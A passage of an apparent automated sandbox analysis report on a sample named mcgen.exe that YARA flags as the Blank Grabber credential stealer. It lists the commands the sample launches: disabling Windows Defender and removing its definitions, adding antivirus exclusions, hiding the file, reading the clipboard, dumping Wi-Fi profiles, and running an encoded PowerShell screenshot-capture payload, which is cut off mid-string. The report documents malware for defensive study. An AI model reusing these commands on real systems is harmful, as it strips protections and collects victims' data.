Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b4290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:22:03
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:22:05
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:22:05
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff7da280000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff7da280000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:22:06
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:22:07
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:22:08
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6036, Parent PID: 3796

General

Target ID:	26
Start time:	03:22:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:22:08
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
Imagebase:	0x7ff6995b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:22:09
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 5040, Parent PID: 7020

General

Target ID:	35
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3816, Parent PID: 3416

General

Target ID:	36
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b4290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:22:10
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 5608, Parent PID: 7020

General

Target ID:	42
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b4290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4